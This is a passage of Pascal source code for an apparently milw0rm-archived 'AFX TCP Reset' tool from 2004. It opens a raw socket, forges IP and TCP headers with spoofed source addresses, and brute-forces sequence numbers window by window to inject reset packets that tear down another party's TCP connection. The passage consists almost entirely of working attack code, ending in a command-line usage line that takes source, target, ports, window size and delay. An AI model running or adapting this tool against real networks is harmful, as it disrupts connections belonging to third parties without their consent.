IncPtr(SizeOf(ipHdr.ip_daddr)); ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_daddr); IncPtr(1); Inc(ChecksumSize); Move(ipHdr.ip_protocol, DataPointer^, sizeof(ipHdr.ip_protocol)); IncPtr(sizeof(ipHdr.ip_protocol)); ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_protocol); TcpHeaderLen := htons(sizeof(tcpHdr)); Move(TcpHeaderLen, DataPointer^, sizeof(TcpHeaderLen)); IncPtr(sizeof(TcpHeaderLen)); ChecksumSize := ChecksumSize + sizeof(TcpHeaderLen); Move(tcpHdr, DataPointer^, sizeof(tcpHdr)); IncPtr(sizeof(tcpHdr)); ChecksumSize := ChecksumSize + sizeof(tcpHdr); tcpHdr.th_checksum := CheckSum(Buffer, ChecksumSize); FillChar(Buffer, sizeof(Buffer), 0); DataPointer := @Buffer[0]; Move(ipHdr, DataPointer^, sizeof(ipHdr)); IncPtr(sizeof(ipHdr)); Move(tcpHdr, DataPointer^, sizeof(tcpHdr)); Socket.sin_family := 2; Socket.sin_port := htons(0); Socket.sin_addr.saddr := inet_addr(pchar(ToIP)); end; procedure Send(TargetIP: string; TargetPort: integer; SourceIP: string; SourcePort: integer; Sequence: longint; Window: longint); var Buffer: TBufferArray; Sck: TSockAddr; Size: Word; begin Header(SourceIP, SourcePort, TargetIP, TargetPort, Sequence, Window, Buffer, Sck, Size); SendTo(hSocket, Buffer, Size, 0, Sck, sizeof(Sck)); end; procedure Init; var wsdata: TWSAdata; op: integer; begin WSAStartup($0002, wsdata); hSocket := Socket(2, 3, 0); op := 1; SetSockOpt(hSocket, 0, 2, @op, sizeof(op)); end; function StrToInt(S: string): integer; begin Val(S, Result, Result); end; procedure DoExit; begin WriteLn('AFX TCP Reset'); WriteLn('http://www.iamaphex.cjb.net'); WriteLn('unremote@knology.net'); WriteLn(''); WriteLn('Usage: reset <src ip> <src port> <dest ip> <dest port> <window size> <send delay> [begin seq num]'); ExitProcess(0); end; begin if Length(ParamStr(1)) < 1 then DoExit; if Length(ParamStr(2)) < 1 then DoExit; if Length(ParamStr(3)) < 1 then DoExit; if Length(ParamStr(4)) < 1 then DoExit; if Length(ParamStr(5)) < 1 then DoExit; SourceHost := ParamStr(1); SourcePort := StrToInt(ParamStr(2)); TargetHost := ParamStr(3); TargetPort := StrToInt(ParamStr(4)); WindowSize := StrToInt(ParamStr(5)); Delay := StrToInt(ParamStr(6)); Randomize; WindowPos := Random(4294967295); if Length(ParamStr(7)) > 0 then WindowPos := StrToInt(ParamStr(7)); Odds := 4294967295 div WindowSize; WindowCount := 0; Init; while WindowCount < Odds do begin if WindowPos > 4294967295 then WindowPos := 0; Send(TargetHost, TargetPort, SourceHost, SourcePort, WindowPos, WindowSize); Inc(WindowCount); Inc(WindowPos, WindowSize); Sleep(Delay); end; end. // milw0rm.com [2004-04-22]